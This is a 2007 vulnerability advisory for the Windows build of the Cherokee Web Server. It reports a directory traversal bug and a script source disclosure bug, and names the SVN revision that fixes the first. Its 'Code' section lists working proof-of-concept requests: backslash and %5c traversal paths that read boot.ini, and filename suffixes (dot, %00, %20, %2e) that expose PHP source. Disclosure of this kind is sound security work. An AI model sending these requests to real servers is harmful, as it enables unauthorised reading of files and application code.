#######################################################################

                             Luigi Auriemma

Application:  Cherokee Web Server
              http://www.cherokee-project.com
Versions:     <= SVN 952 (and current one for bug B)
Platforms:    only Windows affected
Bugs:         A] directory traversal
              B] scripts source disclosure
Exploitation: remote
Date:         17 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Cherokee is a web server written mainly for the *nix environment.
Anyway it's available also for Windows although with less priority
(the pre-compiled binary on the website is the old 0.5.4 version, so
the user should compile the current SVN for a more recent version) and
is the only one vulnerable to the following bugs.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

A directory traversal vulnerability is exploitable through the adding
of a backslash at the beginning of the URI (after the initial slash)
allowing an attacker to download any file in the disk on which is
located the document_root directory.


----------------------------
B] scripts source disclosure
----------------------------

The source code of the scripts on the server (like PHP) can be viewed
through the adding of the chars dot, NULL and space at the end of the
filename.
The cgi-bin executables instead don't seem affected by this problem.


#######################################################################

===========
3) The Code
===========


A]
http://SERVER/\..\..%5c..\..\boot.ini
GET /\..\..\..\..\boot.ini HTTP/1.0
GET /%5c..\..\..\..\boot.ini HTTP/1.0

B]
http://SERVER/file.php.
http://SERVER/file.php%00
http://SERVER/file.php%20
http://SERVER/file.php%2e


#######################################################################

======
4) Fix
======


SVN 954 for bug A.
bug B will be fixed soon.


#######################################################################